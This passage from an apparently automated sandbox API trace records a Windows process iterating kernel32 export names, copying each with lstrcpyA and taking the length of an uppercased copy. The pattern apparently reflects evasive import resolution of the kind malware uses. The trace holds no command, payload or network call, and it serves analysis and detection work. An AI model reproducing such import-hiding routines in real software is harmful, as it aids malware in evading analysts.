(lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0086.962] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0086.962] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0086.962] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0086.962] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0086.962] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0086.962] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0086.962] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0086.962] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0086.962] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0086.962] lstrlenA (lpString="BACKUPREAD") returned 10 [0086.962] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0086.962] lstrlenA (lpString="BACKUPSEEK") returned 10 [0086.962] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0086.962] lstrlenA (lpString="BACKUPWRITE") returned 11 [0086.962] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0086.962] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0086.962] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0086.962] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0086.962] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0086.963] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0086.963] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0086.963] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0086.963] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0086.963] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0086.963] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0086.963] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0086.963] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0086.963] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0086.963] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0086.963] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0086.963] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0086.963] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0086.963] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0086.963] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0086.963] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0086.963] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0086.963] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0086.963] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0086.963] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0086.963] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0086.963] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0086.963] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0086.963] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0086.963] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0086.963] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0086.963] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0086.963] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0086.963] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0086.963] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0086.963] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0086.963] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0086.963] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0086.963] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0086.963] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0086.963] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0086.963] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0086.963] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0086.964] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0086.964] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0086.964] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0086.964] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0086.964] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0086.964] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0086.964] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0086.964] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0086.964] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0086.964] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0086.964] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0086.964] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0086.964] lstrlenA (lpString="BEEP") returned 4 [0086.964] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0086.964] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0086.964] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0086.964] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0086.964] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0086.964] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0086.964] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0086.964] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0086.964] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0086.964] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0086.964] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0086.964] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0086.964] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0086.964] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0086.964] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0086.964] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0086.964] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0086.964] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0086.964] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0086.964] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0086.964] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0086.964] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0086.964] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0086.965] lstrlenA (lpString="CANCELIO") returned 8 [0086.965] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0086.965] lstrlenA (lpString="CANCELIOEX") returned 10 [0086.965] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0086.965] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0086.965] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0086.965] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0086.965] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0086.965] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0086.965] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0086.965] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0086.965] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0086.965] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0086.965] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0086.965] lstrlenA (lpString="CHECKELEVATION") returned 14 [0086.965] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0086.965] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0086.965] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0086.965] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0086.965] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0086.965] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0086.965] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0086.965] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0086.965] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0086.965] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0086.965] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0086.965] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0086.965] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0086.965] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0086.965] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0086.965] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0086.965] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0086.965] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0086.965] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0086.965] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0086.965] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0086.965] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0086.966] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0086.966] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0086.966] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0086.966] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0086.966] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0086.966] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0086.966] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0086.966] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0086.966] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0086.966] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0086.966] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0086.966] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0086.966] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0086.966] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0086.966] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0086.966] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0086.966] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0086.966] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0086.966] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0086.966] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0086.966] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0086.966] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0086.966] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0086.966] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0086.966] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0086.966] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0086.966] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0086.966] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0086.966] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0086.966] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0086.966] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0086.967] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0086.967] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0086.967] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0086.967] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0086.967] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0086.967] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0086.967] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0086.967] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0086.967] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0086.967] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0086.967] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0086.967] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0086.967] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0086.967] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0086.967] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0086.967] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0086.967] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0086.967] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0086.967] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0086.967] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0086.967] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0086.967] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0086.967] lstrlenA (lpString="COPYCONTEXT") returned 11 [0086.967] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0086.967] lstrlenA (lpString="COPYFILEA") returned 9 [0086.967] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0086.967] lstrlenA (lpString="COPYFILEEXA") returned 11 [0086.967] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0086.967] lstrlenA (lpString="COPYFILEEXW") returned 11 [0086.967] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0086.967] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0086.967] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0086.967] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0086.967] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0086.967] lstrlenA (lpString="COPYFILEW") returned 9 [0086.967] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0086.967] lstrlenA (lpString="COPYLZFILE") returned 10 [0086.968] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0086.968] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0086.968] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0086.968] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0086.968] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0086.968] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0086.968] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0086.968] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0086.968] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0086.968] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0086.968] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0086.968] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0086.968] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0086.968] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0086.968] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0086.968] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0086.968] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0086.968] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0086.968] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0086.968] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0086.968] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0086.968] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0086.968] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0086.968] lstrlenA (lpString="CREATEEVENTA") returned 12 [0086.968] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0086.968] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0086.968] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0086.968] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0086.968] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0086.968] lstrlenA (lpString="CREATEEVENTW") returned 12 [0086.968] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0086.968] lstrlenA (lpString="CREATEFIBER") returned 11 [0086.968] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0086.968] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0086.968] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0086.968] lstrlenA (lpString="CREATEFILEA") returned 11 [0086.968] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0086.969] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0086.969] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0086.969] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0086.969] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0086.969] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0086.969] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0086.969] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0086.969] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0086.969] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0086.969] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0086.969] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0086.969] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") 